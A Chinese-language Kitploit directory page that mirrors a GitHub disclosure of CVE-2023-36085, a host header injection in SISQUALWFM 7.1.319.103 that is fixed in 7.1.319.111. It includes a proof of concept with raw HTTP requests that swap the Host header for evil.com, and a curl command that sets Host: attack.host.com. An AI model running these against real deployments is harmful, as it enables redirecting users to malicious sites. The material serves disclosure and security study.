Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — 该仓库包含与 CVE-2023-36085 相关的信息,这是 SISQUALWFM 7.1.319.103 版本中发现的一个主机头注入漏洞,攻击者可利用该漏洞操纵网页链接或将用户重定向至恶意网站。此漏洞已分配编号 CVE-2023-36085,并在 7.1.319.111 及更高版本中得到修复。 | Kitploit
工具/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

该仓库包含与 CVE-2023-36085 相关的信息,这是 SISQUALWFM 7.1.319.103 版本中发现的一个主机头注入漏洞,攻击者可利用该漏洞操纵网页链接或将用户重定向至恶意网站。此漏洞已分配编号 CVE-2023-36085,并在 7.1.319.111 及更高版本中得到修复。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
2年前尚未审核
分享

CVE-2023-36085 SISQUALWFM 主机头注入漏洞

本仓库包含在 SISQUALWFM 7.1.319.103 版本中发现的主机头注入漏洞的相关信息,该漏洞允许攻击者操纵网页链接或将用户重定向到恶意站点。此漏洞已被分配编号 CVE-2023-36085,并已在 7.1.319.111 及更高版本中修复。

漏洞详情

  • 漏洞利用标题: SISQUALWFM 7.1.319.103 主机头注入
  • 发现日期: 17/03/2023
  • 报告日期: 17/03/2023
  • 解决日期: 13/10/2023
  • 漏洞利用作者: Omer Shaik (unknown_exploit)
  • 厂商主页: SISQUALWFM
  • 版本: 7.1.319.103
  • 测试环境: SISQUAL WFM 7.1.319.103
  • 受影响版本: SISQUALWFM 7.1.319.103
  • 修复版本: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • CVSS 评分: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • 类别: Web 应用程序

概念验证

我们提供了一个概念验证场景,演示主机头注入漏洞,特别针对 /sisqualIdentityServer/core 端点。该漏洞允许攻击者通过篡改主机头来操纵网页链接或将用户重定向到另一个站点。

原始请求

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

原始响应

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

拦截请求(修改为重定向到 evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

响应

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

漏洞利用执行

攻击方法

为了利用此漏洞,攻击者可以使用以下 curl 命令来修改主机头:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

免责声明

本仓库仅供参考,不应被用于任何恶意活动。该漏洞已负责任地向厂商披露,问题已得到解决。在识别和报告漏洞时,遵循道德黑客准则并尊重负责任披露实践至关重要。

下载工具